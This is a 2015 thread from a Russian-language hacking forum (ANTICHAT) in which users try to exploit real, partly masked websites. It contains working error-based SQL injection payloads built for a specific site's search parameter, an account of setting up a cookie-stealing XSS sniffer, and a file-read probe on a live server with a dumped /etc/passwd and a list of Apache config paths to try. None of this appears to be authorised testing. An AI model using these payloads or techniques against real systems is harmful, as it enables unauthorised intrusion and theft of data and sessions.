HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #24041  
Старый 28.01.2015, 00:34
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Цитата:
Сообщение от XAMEHA  
XAMEHA said:
Ресурс, приведенный вами, ведет логи. Ошибка происходит вследствие того, что каждый URL считается уникальным. После повторного захода по этому же URL возникает ошибка Duplicate entry. Это не SQLi.
Это очевидно, что ведёт лог, по всем признакам похоже на иньекцию error base и я уверен что это SQLi! только вот у самого не получилось запрос составить, думал может кому то повезёт...
 
Ответить с цитированием

  #24042  
Старый 28.01.2015, 02:13
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от DezMond™  
DezMond™ said:
Это очевидно, что ведёт лог, по всем признакам похоже на иньекцию error base и я уверен что это SQLi! только вот у самого не получилось запрос составить, думал может кому то повезёт...
вы ошибаетесь. ошибка возникает при добавлении в лог. даже если так, то mq = on, а передаваемый URL — str
 
Ответить с цитированием

  #24043  
Старый 28.01.2015, 09:48
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Да, можно наблюдать, что параметр достаточно экранируется. Ещё можно заметить, что используется драйвер MySQL Improved, а значит, что наиболее вероятно в запрос ни один из параметров непосредственно не попадает. Пациент мертв дважды.
 
Ответить с цитированием

  #24044  
Старый 28.01.2015, 17:16
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию

Код:
Code:
http://infe{GOOGLE INDEX}vents.com/Lightbox{GOOGLE INDEX}Detail.aspx?boxid=229883%27&start=17
ничего не даёт, кроме раскрытия путей, верно?
 
Ответить с цитированием

  #24045  
Старый 28.01.2015, 17:57
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от vikler  
vikler said:
Код:
Code:
http://infe{GOOGLE INDEX}vents.com/Lightbox{GOOGLE INDEX}Detail.aspx?boxid=229883%27&start=17
ничего не даёт, кроме раскрытия путей, верно?
ну и раскрытие информации о сервере
 
Ответить с цитированием

  #24046  
Старый 29.01.2015, 12:46
CyberTm1
Guest
Сообщений: n/a
Провел на форуме:
364

Репутация: 0
По умолчанию

Добрый день! Кто-нибудь может подсказать как проверить на уязвимость GHOST удаленный сервер, а не собственный?
 
Ответить с цитированием

  #24047  
Старый 29.01.2015, 13:46
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от CyberTm1  
CyberTm1 said:
Добрый день! Кто-нибудь может подсказать как проверить на уязвимость GHOST удаленный сервер, а не собственный?
http://habrahabr.ru/company/dsec/blog/249007/#comment_8247401
 
Ответить с цитированием

  #24048  
Старый 01.02.2015, 16:29
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Насчёт XSS. Делал по этому примеру воспользовался своим шеллом. Отредактировал файл .htaccess создал файл s.php с тем кодом и имедж ..Потом решил на себе поэкспериментировать и когда все сделал перешел по вредоносной ссылке.. но в итоге пришел отчет на почту только IP а куки были ПУСТЫ

вроде все правильно настроил, раз отчет пришел Ноо.. И еще вопрос когда перехожу на ссылку отображается сайт и уязвимое место и весь код в расшифрованном виде.. т.е видно где залит сниффер
 
Ответить с цитированием

  #24049  
Старый 01.02.2015, 17:48
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от vikler  
vikler said:
Код:
Code:
http://sutton{GOOGLE INDEX}images.com/searchre{GOOGLE INDEX}sult.aspx?archive=Archive&search=08gp03a'&page=9
Не получается здесь раскрутить у меня
Кто-нибудь может? Ну или не обызательно в этом скрипте, на сайте полно дырок вообще
В данном скрипте раскрутить можно только через ошибку, так как уязвимый параметр участвует в 2-х запросах с разным количеством полей:

Код:
Code:
SELECT count(*) from images where (match(filename,description,supplementalcategories,title,keywords,credit) against('("INJ")' IN BOOLEAN MODE)) AND (archive='Archive') ORDER BY lastmodified DESC, id DESC LIMIT 2000

SELECT filename,fullpath,description,title,keywords,credit from images where  (match(filename,description,supplementalcategories,title,keywords,credit) against('("INJ")' IN BOOLEAN MODE)) AND (archive='Archive') ORDER BY lastmodified DESC, id DESC LIMIT 2000
Запросы составлены таким образом, что составить универсальный вектор с использованием UNION SELECT нельзя. Пример вывода через ошибку:

Код:
Code:
archive=Archive&search=08gp03a'*updatexml(1,concat(0x3A,version()),1)*'&page=9

archive=Archive&search=%22%29%27%20IN%20BOOLEAN%20MODE%29%29AND%28archive=%27Archive%27%29ORDER/**/BY%28SELECT%28i/**/IS/**/NOT/**/NULL%29-%28-9223372036854775808%29FROM%28SELECT%28(SELECT version())%29i%29a%29%20+--+&page=9
Последний вектор дает 475 байтов вывода.
 
Ответить с цитированием

  #24050  
Старый 02.02.2015, 19:52
d4rk73rr0r
Guest
Сообщений: n/a
Провел на форуме:
34107

Репутация: 0
По умолчанию

Всем добрый вечер. Ребята помогите раскрыть путь к сайта.

http://subdomain1.subdomain2.domain.com/

web server operating system: Linux Ubuntu 11.10 (Oneiric Ocelot)

web application technology: Apache 2.2.20, PHP 5.3.6

back-end DBMS: MySQL 5.0

пробовал и нашел:

Код:
Code:
/etc/apparmor.d/usr.sbin.mysqld
/var/run/mysqld/mysqld.sock
/etc/mysql/my.cnf
/etc/init.d/mysql
/etc/hosts
/etc/passwd
-------------------------------------

Результат ноль:

Код:
Code:
·         /var/www/html/
·         /var/www/web1/html/
·         /var/www/sitename/htdocs/
·         /var/www/localhost/htdocs
·         /var/www/vhosts/sitename/httpdocs/
·         /etc/init.d/apache
·         /etc/init.d/apache2
·         /etc/httpd/httpd.conf
·         /etc/apache/apache.conf
·         /etc/apache/httpd.conf
·         /etc/apache2/apache2.conf
·         /etc/apache2/httpd.conf
·         /usr/local/apache2/conf/httpd.conf
·         /usr/local/apache/conf/httpd.conf
·         /opt/apache/conf/httpd.conf
·         /home/apache/httpd.conf
·         /home/apache/conf/httpd.conf
·         /etc/apache2/sites-available/default
·         /etc/apache2/vhosts.d/default_vhost.include
---------------------------------------

etc/passwd

Код:
Code:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:108::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vps68:x:1000:1000:vps68,,,:/home/vps68:/bin/bash
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false
не могу найти путь к апаче
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ